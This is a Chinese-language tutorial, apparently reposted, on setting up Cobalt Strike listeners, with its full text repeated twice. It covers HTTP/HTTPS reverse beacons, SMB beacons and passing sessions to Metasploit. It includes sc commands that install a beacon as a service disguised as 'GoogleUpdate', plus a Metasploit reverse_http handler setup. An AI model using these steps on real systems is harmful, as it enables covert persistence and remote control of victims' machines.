Cobalt Strike监听及Payload使用
CobaltStrike是一款模仿高级威胁者攻击行为的后渗透攻击框架。覆盖了APT攻击链中所需要的多个技术环节,是一款小巧、灵活而又功能强大的后渗透攻击工具。
https://www.cobaltstrike.com/support
CobaltStrike监听器主要是指,在团队服务器上监听某个端口,然后等待负载[payload]回连到这个端口上,进行传输数据。注意:CobaltStrike默认只能生成Windows系统模式的Payload,操作过程具体如下:
点击菜单中的"Listeners"->"payload"下拉就能看到CobaltStrike所支持的所有payload了。
所谓基于http协议的反向连接,就是把木马回连的流量,按照http协议的数据格式进行封装,该方式又叫模拟http协议进行传输,因为http协议对防火墙的穿透效果较好,所以大多数人喜欢使用基于http协议Payload。
(1)设置监听主机的ip地址及端口号:
(2)生成windows系统的可执行文件
(3)选择http协议,可执行文件为64位:
(4)再目标主机上双击可行性文件后,可看到能够成功反弹beacon shell
(1)首先创建一个beacon_https的监听器,设置监听的ip地址和端口号:
(2)生成 https 协议的 beacon shell:
(3)将生成的 beacon shell 放在目标主机的 C:\Windows\Help\Help 目录,执行指令:
#sc create GoogleUpdate binpath= "C:\Windows\Help\Help\servrcs.exe" start= auto displayname= "Plugins Transfer Service"创建系统服务
#sc start GoogleUpdate启动该服务
#sc stop GoogleUpdate停止该服务
#sc delete GoogleUpdate删除指定服务,一定要先停止再删除
SMB Beacon使用命名管道通过父级Beacon进行通讯,当两个Beacons链接后,子Beacon从父Beacon获取到任务并发送。因为链接的Beacons使用Windows命名管道进行通信,此流量封装在SMB协议中,所以SMB Beacon相对隐蔽。
(2)派生一个SMB Beacon 在 Listeners 生成 SMB Beacon >目标主机>右键>spawn>选中Listeners >choose
(3)可以主Beacon上 用link host链接它或者unlink host断开它 。
(4)后面4个圈的主机,就代表派生出来的shell.
外部监听器就是为了更方便的去配合其它的一些渗透工具如:Metasploit/empire 等,进行协同渗透而设计的。比如,现在通过其它方式已经拿到了目标内网一台机器的 beaconshell,但由于 CobaltStrike 自身内置的相关内网渗透功能太少, 想用 msf 或者 empire 继续去渗透目标内网,这时候我们就可以使用 CobaltStrike 的外部监听器了。
(1)先启动msf监听器:
>>> use exploit/multi/handler
>>> set payload windows/meterpreter/reverse_http
>>> set lhost 192.168.80.129
>>> set lport 1111
>>> exploit -j
(2)设置外部监听的ip地址和端口号
(3)右键点击已有的beacon shell,选择Spawn
(4)选择foreign_http 外部监听
(5)然后就可以在msf上成功看到反弹到的meterpreter了
官方网站:
https://www.cobaltstrike.comhttps://www.cobaltstrike.com/support
CobaltStrike监听介绍
CobaltStrike监听器主要是指,在团队服务器上监听某个端口,然后等待负载[payload]回连到这个端口上,进行传输数据。注意:CobaltStrike默认只能生成Windows系统模式的Payload,操作过程具体如下:
点击菜单中的"Listeners"->"payload"下拉就能看到CobaltStrike所支持的所有payload了。
基于http协议的反向连接
所谓基于http协议的反向连接,就是把木马回连的流量,按照http协议的数据格式进行封装,该方式又叫模拟http协议进行传输,因为http协议对防火墙的穿透效果较好,所以大多数人喜欢使用基于http协议Payload。
(1)设置监听主机的ip地址及端口号:
(2)生成windows系统的可执行文件
(3)选择http协议,可执行文件为64位:
(4)再目标主机上双击可行性文件后,可看到能够成功反弹beacon shell
基于https协议的反向连接
(1)首先创建一个beacon_https的监听器,设置监听的ip地址和端口号:
(2)生成 https 协议的 beacon shell:
(3)将生成的 beacon shell 放在目标主机的 C:\Windows\Help\Help 目录,执行指令:
#sc create GoogleUpdate binpath= "C:\Windows\Help\Help\servrcs.exe" start= auto displayname= "Plugins Transfer Service"创建系统服务
#sc start GoogleUpdate启动该服务
#sc stop GoogleUpdate停止该服务
#sc delete GoogleUpdate删除指定服务,一定要先停止再删除
SMB 监听器
SMB Beacon使用命名管道通过父级Beacon进行通讯,当两个Beacons链接后,子Beacon从父Beacon获取到任务并发送。因为链接的Beacons使用Windows命名管道进行通信,此流量封装在SMB协议中,所以SMB Beacon相对隐蔽。
(2)派生一个SMB Beacon 在 Listeners 生成 SMB Beacon >目标主机>右键>spawn>选中Listeners >choose
(3)可以主Beacon上 用link host链接它或者unlink host断开它 。
(4)后面4个圈的主机,就代表派生出来的shell.
反向http协议外部监听器
外部监听器就是为了更方便的去配合其它的一些渗透工具如:Metasploit/empire 等,进行协同渗透而设计的。比如,现在通过其它方式已经拿到了目标内网一台机器的 beaconshell,但由于 CobaltStrike 自身内置的相关内网渗透功能太少, 想用 msf 或者 empire 继续去渗透目标内网,这时候我们就可以使用 CobaltStrike 的外部监听器了。
(1)先启动msf监听器:
>>> use exploit/multi/handler
>>> set payload windows/meterpreter/reverse_http
>>> set lhost 192.168.80.129
>>> set lport 1111
>>> exploit -j
(2)设置外部监听的ip地址和端口号
(3)右键点击已有的beacon shell,选择Spawn
(4)选择foreign_http 外部监听
(5)然后就可以在msf上成功看到反弹到的meterpreter了
声明:本站所有文章资源内容,如无特殊说明或标注,均为采集网络资源。如若本站内容侵犯了原著者的合法权益,可联系本站删除。